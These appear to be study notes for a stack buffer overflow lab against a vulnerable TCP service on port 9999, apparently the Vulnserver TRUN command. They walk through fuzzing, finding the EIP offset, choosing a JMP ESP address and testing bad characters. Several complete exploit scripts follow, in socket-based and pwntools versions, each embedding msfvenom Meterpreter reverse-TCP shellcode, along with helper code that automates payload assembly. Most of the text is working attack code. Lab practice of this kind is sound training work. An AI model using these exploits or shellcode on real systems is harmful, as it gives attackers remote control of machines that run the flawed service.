Buffer overflow

Notes:

  • EIP holds the address of the next instruction to execute. The overflow overwrites the saved return address on the stack, so when the vulnerable function returns we choose what lands in EIP and can redirect execution to our payload.

  • ESP points at the stack just past the overwritten return address, which is where the rest of our buffer (NOP sled + shellcode) lands. A JMP ESP in a non-ASLR module sends execution there without needing to know the stack address.

  • Bad chars (\x00 is left out because the null byte is always bad; the list must be bytes so it can be joined with the rest of the payload)

badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

Steps (old):

  1. Fuzz the server until it crashes

    generic_send_tcp 192.168.1.10 9999 trun.spk 0 0

    The .spk file is a SPIKE script for one command. The one below fuzzes STATS; swap the string for "TRUN " to fuzz that command.

    fuzz.spk

    s_readline();
    s_string("STATS ");
    s_string_variable("0");
    
  2. Now analyze the crash in the debugger and work out roughly how many bytes were sent when it crashed (the difference between the first and last hex pointers in the dump, 2984 here).

  3. With msf-pattern_create -l 3000 we create a cyclic pattern and send it from the python exploit (3000 because it is just above the 2984 seen in the crash).

  4. Now create the python exploit

    import socket
    
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    
    payload = [
        b"TRUN /:./",
        b"<output of msf-pattern_create -l 3000>"  # paste the full pattern here
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  5. Now copy the EIP value from the registers pane in Immunity Debugger

  6. msf-pattern_offset -l 3000 -q 386F4337   # -q takes the EIP value from the debugger

    msf-pattern_offset -l 3000 -q 386F4337
    [*] Exact match at offset 2003
  7. Python exploit: confirm the offset

    import socket
    
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    offset= 2003
    payload = [
        b"TRUN /:./",
        b"A"*offset,
        b"B"*4  # EIP should now read 42424242
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  8. With mona.py copied into Immunity's PyCommands folder, run !mona jmp -r esp to list JMP ESP (and equivalent) addresses we can put in EIP

  9. Pick an address from a module where the protection columns (Rebase, SafeSEH, ASLR, NXCompat) are all False and whose four bytes contain no bad characters, then pack it little-endian

    import socket
    import struct
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    offset = 2003 #output of msf-offset
    new_eip = struct.pack("<I", 0x62501203)  # jmp esp from !mona, packed little-endian

    payload = [
        b"TRUN /:./",
        b"A"*offset,
        new_eip
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  10. Look for bad characters

    import socket
    import struct
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    offset = 2003 #output of msf-offset
    new_eip = struct.pack("<I", 0x62501203) 
    badchars = (
      b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
      b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
      b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
      b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
      b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
      b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
      b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
      b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
      b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
      b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
      b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
      b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
      b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
      b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
      b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
      b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
    )

    payload = [
        b"TRUN /:./",
        b"A"*offset,
        new_eip,
        badchars  # lands at ESP, so follow ESP in the dump to check it
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  11. Follow ESP in the process dump and compare the bytes with the list: any value that is missing, changed, or cuts the sequence short is a bad character. Remove it from the list and resend, since one mangled byte can hide the ones after it

  12. Generate shellcode using msfvenom, listing every bad char found so far in -b (e.g. -b "\x00\x0a\x0d")

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=1212 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
    # EXITFUNC=thread so the service keeps running when the shell is closed
    # Note the payload size: offset + 4 (EIP) + len(nop_sled) + payload size must stay below total_length
  13. Now add the nop sled and the shellcode, and fill the rest of the buffer with any other byte (e.g. C)

```python
import socket
import struct
s =socket.socket()
s.connect(("192.168.1.10", 9999))
total_length = 2984 # The diff between hex pointers
offset = 2003 #output of msf-offset
new_eip = struct.pack("<I", 0x62501203) 
nop_sled = b"\x90" * 16  # padding between the jump and the shellcode so the decoder has room
buf =  b""
buf += b"\xdb\xdc\xb8\x99\xdb\xf6\x1e\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x59\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x7b"
buf += b"\x2e\x0a\xf6\xf4\xd1\xf3\x07\x6a\x5b\x16\x36\xb8\x3f"
buf += b"\x52\x6b\x0c\x4b\x36\x80\xe7\x19\xa3\xa9\x08\x16\xb9"
buf += b"\xe1\xf9\x9e\x74\xd4\x34\x21\x24\x24\x57\xdd\x37\x79"
buf += b"\xb7\xdc\xf7\x8c\xb6\x19\x4e\xfa\x57\xf7\xda\x56\xb7"
buf += b"\xaf\x57\x14\x8b\x4e\xb8\x12\xb3\x28\xbd\xe5\x47\x85"
buf += b"\xbc\x35\x2c\x4d\x9f\xb4\xe1\x3e\x54\xfe\x1d\x3a\xa3"
buf += b"\x8b\x21\x75\xcb\x3d\xd2\x41\xb8\xbf\x32\x98\x7e\x7e"
buf += b"\x75\xd6\xd2\x80\x4e\xd1\xca\xf6\xa4\x21\x76\x01\x7f"
buf += b"\x5b\xac\x84\x9f\xfb\x27\x3e\x7b\xfd\xe4\xd9\x08\xf1"
buf += b"\x41\xad\x56\x16\x57\x62\xed\x22\xdc\x85\x21\xa3\xa6"
buf += b"\xa1\xe5\xef\x7d\xcb\xbc\x55\xd3\xf4\xde\x32\x8c\x50"
buf += b"\x95\xd1\xdb\xe5\x56\x2a\xe4\xbb\xc0\xe6\x29\x44\x10"
buf += b"\x61\x39\x37\x22\x2e\x91\xdf\x0e\xa7\x3f\x27\x07\xaf"
buf += b"\xbf\xf7\xaf\xa0\x41\xf8\xcf\xe9\x85\xac\x9f\x81\x2c"
buf += b"\xcd\x74\x52\xd0\x18\xe0\x58\x46\x63\x5c\x5d\x80\x0b"
buf += b"\x9e\x5e\xa8\x77\x17\xb8\xe0\xd7\x77\x15\x41\x88\x37"
buf += b"\xc5\x29\xc2\xb8\x3a\x49\xed\x13\x53\xe0\x02\xcd\x0b"
buf += b"\x9d\xbb\x54\xc7\x3c\x43\x43\xad\x7f\xcf\x61\x51\x31"
buf += b"\x38\x00\x41\x26\x5f\xea\x99\xb7\xca\xea\xf3\xb3\x5c"
buf += b"\xbd\x6b\xbe\xb9\x89\x33\x41\xec\x8a\x34\xbd\x71\xba"
buf += b"\x4f\x88\xe7\x82\x27\xf5\xe7\x02\xb8\xa3\x6d\x02\xd0"
buf += b"\x13\xd6\x51\xc5\x5b\xc3\xc6\x56\xce\xec\xbe\x0b\x59"
buf += b"\x85\x3c\x75\xad\x0a\xbf\x50\xad\x4d\x3f\x26\x9a\xf5"
buf += b"\x57\xd8\x9a\x05\xa7\xb2\x1a\x56\xcf\x49\x34\x59\x3f"
buf += b"\xb1\x9f\x32\x57\x38\x4e\xf0\xc6\x3d\x5b\x54\x56\x3d"
buf += b"\x68\x4d\x69\x44\x01\x72\x8a\xb9\x0b\x17\x8b\xb9\x33"
buf += b"\x29\xb0\x6f\x0a\x5f\xf7\xb3\x29\x50\x42\x91\x18\xfb"
buf += b"\xac\x85\x5b\x2e"

shellcode = buf

payload = [
    b"TRUN /:./",
    b"A"*offset,
    new_eip,
    nop_sled,
    shellcode,
    b"C" * (total_length - offset - len(new_eip) - len(nop_sled) - len(shellcode))  # fill to the crash length
]
payload = b"".join(payload)
s.send(payload)
s.close()
```
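The pattern and offset steps above are done with msf tools; the following is an added example (not code from these notes) that reimplements them in Python together with the buffer assembly from steps 9, 12 and 13, so the length and bad-char checks the notes mention by hand are enforced in code. It assumes msf-pattern_create's default alphabet (uppercase, lowercase, digit triplets) and reuses the notes' numbers: EIP 386F4337, offset 2003, jmp esp 0x62501203, crash length 2984. The 8 bytes of \xcc passed as shellcode in the usage are a stand-in, not real shellcode.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length: int) -> bytes:
    """Same sequence as msf-pattern_create with its default charsets:
    Aa0Aa1...Aa9Ab0...Az9Ba0... cut to `length` bytes."""
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # 20280 bytes is all the non-repeating sequence gives


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Immunity shows EIP as a number (0x386F4337); the bytes that overwrote
    the saved return address sit little-endian on the stack, so search for
    that byte order, exactly as msf-pattern_offset -q does."""
    needle = struct.pack("<I", eip)
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError(f"EIP {eip:#010x} ({needle!r}) not found in pattern")
    return offset


def verify_payload(offset: int) -> bytes:
    """Step 7 check: `offset` A's then four B's; EIP must read 42424242."""
    return b"A" * offset + b"B" * 4


def build_payload(command: bytes, offset: int, jmp_esp: int, shellcode: bytes,
                  total_length: int, badchars: bytes = b"\x00",
                  nops: int = 16) -> bytes:
    """Steps 9-13: filler, little-endian jmp esp, NOP sled, shellcode, and
    C's up to the crash length. Refuses bad chars in the address or the
    shellcode and refuses a payload that would not fit."""
    ret = struct.pack("<I", jmp_esp)
    for name, blob in (("jmp esp address", ret), ("shellcode", shellcode)):
        clash = sorted(set(blob) & set(badchars))
        if clash:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in clash]}")
    body = b"A" * offset + ret + b"\x90" * nops + shellcode
    if len(body) > total_length:
        raise ValueError(f"payload is {len(body) - total_length} bytes over the crash length")
    body += b"C" * (total_length - len(body))
    return command + body


if __name__ == "__main__":
    pattern = pattern_create(3000)
    offset = pattern_offset(pattern, 0x386F4337)      # 2003, as in the notes
    # stand-in shellcode (not real), just to show the assembly
    payload = build_payload(b"TRUN /:./", offset, 0x62501203, b"\xcc" * 8, 2984)
    print(offset, len(payload))
```

The find in pattern_offset is unambiguous because an uppercase letter only ever occurs at a position that is a multiple of three, so the four-byte needle can match at exactly one place; a pattern longer than 20280 bytes would repeat and break that property, which is why the generator stops there.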

Without pwntools

import socket
import sys

username = b"heath"
# 2012 bytes of filler, then the jmp esp address (little-endian), then a NOP sled
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32

buf =  b""
buf += b"\xdb\xdc\xb8\x99\xdb\xf6\x1e\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x59\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x7b"
buf += b"\x2e\x0a\xf6\xf4\xd1\xf3\x07\x6a\x5b\x16\x36\xb8\x3f"
buf += b"\x52\x6b\x0c\x4b\x36\x80\xe7\x19\xa3\xa9\x08\x16\xb9"
buf += b"\xe1\xf9\x9e\x74\xd4\x34\x21\x24\x24\x57\xdd\x37\x79"
buf += b"\xb7\xdc\xf7\x8c\xb6\x19\x4e\xfa\x57\xf7\xda\x56\xb7"
buf += b"\xaf\x57\x14\x8b\x4e\xb8\x12\xb3\x28\xbd\xe5\x47\x85"
buf += b"\xbc\x35\x2c\x4d\x9f\xb4\xe1\x3e\x54\xfe\x1d\x3a\xa3"
buf += b"\x8b\x21\x75\xcb\x3d\xd2\x41\xb8\xbf\x32\x98\x7e\x7e"
buf += b"\x75\xd6\xd2\x80\x4e\xd1\xca\xf6\xa4\x21\x76\x01\x7f"
buf += b"\x5b\xac\x84\x9f\xfb\x27\x3e\x7b\xfd\xe4\xd9\x08\xf1"
buf += b"\x41\xad\x56\x16\x57\x62\xed\x22\xdc\x85\x21\xa3\xa6"
buf += b"\xa1\xe5\xef\x7d\xcb\xbc\x55\xd3\xf4\xde\x32\x8c\x50"
buf += b"\x95\xd1\xdb\xe5\x56\x2a\xe4\xbb\xc0\xe6\x29\x44\x10"
buf += b"\x61\x39\x37\x22\x2e\x91\xdf\x0e\xa7\x3f\x27\x07\xaf"
buf += b"\xbf\xf7\xaf\xa0\x41\xf8\xcf\xe9\x85\xac\x9f\x81\x2c"
buf += b"\xcd\x74\x52\xd0\x18\xe0\x58\x46\x63\x5c\x5d\x80\x0b"
buf += b"\x9e\x5e\xa8\x77\x17\xb8\xe0\xd7\x77\x15\x41\x88\x37"
buf += b"\xc5\x29\xc2\xb8\x3a\x49\xed\x13\x53\xe0\x02\xcd\x0b"
buf += b"\x9d\xbb\x54\xc7\x3c\x43\x43\xad\x7f\xcf\x61\x51\x31"
buf += b"\x38\x00\x41\x26\x5f\xea\x99\xb7\xca\xea\xf3\xb3\x5c"
buf += b"\xbd\x6b\xbe\xb9\x89\x33\x41\xec\x8a\x34\xbd\x71\xba"
buf += b"\x4f\x88\xe7\x82\x27\xf5\xe7\x02\xb8\xa3\x6d\x02\xd0"
buf += b"\x13\xd6\x51\xc5\x5b\xc3\xc6\x56\xce\xec\xbe\x0b\x59"
buf += b"\x85\x3c\x75\xad\x0a\xbf\x50\xad\x4d\x3f\x26\x9a\xf5"
buf += b"\x57\xd8\x9a\x05\xa7\xb2\x1a\x56\xcf\x49\x34\x59\x3f"
buf += b"\xb1\x9f\x32\x57\x38\x4e\xf0\xc6\x3d\x5b\x54\x56\x3d"
buf += b"\x68\x4d\x69\x44\x01\x72\x8a\xb9\x0b\x17\x8b\xb9\x33"
buf += b"\x29\xb0\x6f\x0a\x5f\xf7\xb3\x29\x50\x42\x91\x18\xfb"
buf += b"\xac\x85\x5b\x2e"

payload = buf

try:
    print('Sending payload .......')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.1.14', 9999))
    s.recv(1024)
    s.recv(1024)
    s.send(username + b'\r\n')
    s.recv(1024)
    s.send(message + payload + b'\r\n')
    s.recv(1024)
    s.close()
except OSError:
    print('Cannot connect to server')
    sys.exit(1)

Finding jumps using mona:

!mona jmp -r esp -cpb "\x00"

Finding offsets using mona:

!mona findmsp -distance 600

Automating(bad chars) with mona:

!mona config -set workingfolder C:\mona
!mona bytearray -b "\x00"
!mona compare -f C:\mona\bytearray.bin -a <esp addr>
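The bytearray and compare commands above do the bad-char loop inside the debugger. As an added example (not from these notes or from mona), the following Python does the same comparison offline and runs the send-compare-exclude loop one byte per round, which matters because a single mangled byte (or a byte the service stops reading at) hides everything after it. The fake_esp_dump function is a constructed stand-in for "send the probe and read memory at ESP"; it models a service that turns 0x0d into 0x00 and stops at 0x0a, which is an assumption made for the example, not a property of the target in the notes.

```python
KNOWN_BAD = b"\x00"  # the null terminator is always treated as bad


def bytearray_without(badchars: bytes = KNOWN_BAD) -> bytes:
    """What `!mona bytearray -b "..."` writes to bytearray.bin: every byte
    value 0x00-0xff except the ones listed."""
    return bytes(b for b in range(256) if b not in badchars)


def first_mismatch(sent: bytes, dump: bytes):
    """What `!mona compare -f ... -a <esp>` does: walk the bytes read back at
    ESP against the bytes sent. Returns (offset, expected, found) for the
    first difference, with found=None if the dump was cut short, or None
    when everything matches (mona's "unmodified")."""
    for i, expected in enumerate(sent):
        if i >= len(dump):
            return (i, expected, None)
        if dump[i] != expected:
            return (i, expected, dump[i])
    return None


def find_badchars(send_and_read_esp, known: bytes = KNOWN_BAD,
                  max_rounds: int = 32) -> bytes:
    """Repeat send -> compare -> exclude the mismatched byte, one byte per
    round, until the probe comes back intact. Returns the sorted list to
    pass to msfvenom -b."""
    bad = set(known)
    for _ in range(max_rounds):
        probe = bytearray_without(bytes(bad))
        mismatch = first_mismatch(probe, send_and_read_esp(probe))
        if mismatch is None:
            return bytes(sorted(bad))
        bad.add(mismatch[1])
    raise RuntimeError(f"still finding bad chars after {max_rounds} rounds")


def fake_esp_dump(buf: bytes) -> bytes:
    """Constructed stand-in for 'send the probe, read memory at ESP'.
    Models a service that rewrites 0x0d to 0x00 and stops reading at 0x0a.
    Against a real target this is the socket send plus the debugger dump."""
    return buf.replace(b"\x0d", b"\x00").split(b"\x0a")[0]


if __name__ == "__main__":
    print(find_badchars(fake_esp_dump))  # b'\x00\n\r'
```

Feed the returned bytes to msfvenom as the -b list. Excluding one byte per round rather than everything that looks wrong keeps the list minimal; an over-long list just shrinks the alphabet the encoder can use and makes shikata_ga_nai output bigger.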

With pwntools

#!/usr/bin/env python3
from pwn import *

host = "192.168.1.14"
port = 9999
cmd = b"TRUN /.:/" # cmd to run can be found after spiking
jmp_esp = 0x625011af # jump point !mona jmp -r esp
buf =  b""
buf += b"\xb8\xaa\x8c\x9d\xa6\xd9\xce\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x5e\x83\xc2\x04\x31\x42\x11\x03\x42\x11\xe2"
buf += b"\x5f\x70\x75\x29\x9f\x89\x86\x56\x16\x6c\xb7\x44\x4c"
buf += b"\xe4\xea\x58\x07\xa8\x06\x12\x45\x59\x26\xdb\xe2\x13"
buf += b"\x60\x2c\x43\x99\x56\x03\x6b\xb2\xab\x02\x17\xc9\xff"
buf += b"\xe4\x26\x02\xf2\xe5\x6f\xd4\x78\x09\x3d\x6c\xd0\xc5"
buf += b"\x96\xf9\x97\xd9\x19\x2e\x9c\x62\x61\x4b\x63\x16\xdd"
buf += b"\x52\xb4\x5c\x85\x74\x64\xe8\x7d\x6d\x85\x3d\xf8\x44"
buf += b"\xf1\xfd\x4b\xdc\xce\x76\x7a\x1d\x2f\x5f\x4d\x21\x9c"
buf += b"\x9e\x62\xac\xdc\xe7\x44\x4f\xab\x13\xb7\xf2\xac\xe7"
buf += b"\xca\x28\x38\xf8\x6c\xba\x9a\xdc\x8d\x6f\x7c\x96\x81"
buf += b"\xc4\x0a\xf0\x85\xdb\xdf\x8a\xb1\x50\xde\x5c\x30\x22"
buf += b"\xc5\x78\x19\xf0\x64\xd8\xc7\x57\x98\x3a\xaf\x08\x3c"
buf += b"\x30\x5d\x5e\x40\xb9\x9e\x5f\x1c\x2e\x53\x92\x9f\xae"
buf += b"\xfb\xa5\xec\x9c\xa4\x1d\x7b\xad\x2d\xb8\x7c\xa4\x39"
buf += b"\x3b\x52\x0e\x29\xc5\x53\x6f\x60\x02\x07\x3f\x1a\xa3"
buf += b"\x28\xd4\xda\x4c\xfd\x41\xd0\xda\x3e\x3d\xe5\x0c\xd7"
buf += b"\x3c\xe5\x34\xf5\xc8\x03\x64\xa9\x9a\x9b\xc5\x19\x5b"
buf += b"\x4b\xae\x73\x54\xb4\xce\x7b\xbe\xdd\x65\x94\x17\xb6"
buf += b"\x11\x0d\x32\x4c\x83\xd2\xe8\x29\x83\x59\x19\xce\x4a"
buf += b"\xaa\x68\xdc\xbb\xcd\x92\x1c\x3c\x78\x93\x76\x38\x2a"
buf += b"\xc4\xee\x42\x0b\x22\xb1\xbd\x7e\x30\xb5\x42\xff\x01"
buf += b"\xce\x75\x95\x2d\xb8\x79\x79\xae\x38\x2c\x13\xae\x50"
buf += b"\x88\x47\xfd\x45\xd7\x5d\x91\xd6\x42\x5e\xc0\x8b\xc5"
buf += b"\x36\xee\xf2\x22\x99\x11\xd1\x30\xde\xee\xa4\x1e\x47"
buf += b"\x87\x56\x1f\x77\x57\x3c\x9f\x27\x3f\xcb\xb0\xc8\x8f"
buf += b"\x34\x1b\x81\x87\xbf\xca\x63\x39\xc0\xc6\x22\xe7\xc1"
buf += b"\xe5\xfe\x18\xb8\x86\x01\xd9\x3d\x8f\x65\xd9\x3e\xaf"
buf += b"\x9b\xe5\xe9\x96\xe9\x28\x2a\xad\xf2\xb6\x86\xd8\x9a"
buf += b"\x6e\x43\x61\xc7\x90\xbe\xa6\xfe\x12\x4a\x57\x05\x0a"
buf += b"\x3f\x52\x41\x8c\xac\x2e\xda\x79\xd2\x9d\xdb\xab"
shellcode = buf
padding = b"A"*2003 #output of msf-pattern-offset

payload = cmd
payload += padding
payload += p32(jmp_esp)
payload += b"\x90"*100
payload += shellcode

p = remote(host, port)
p.sendline(payload)
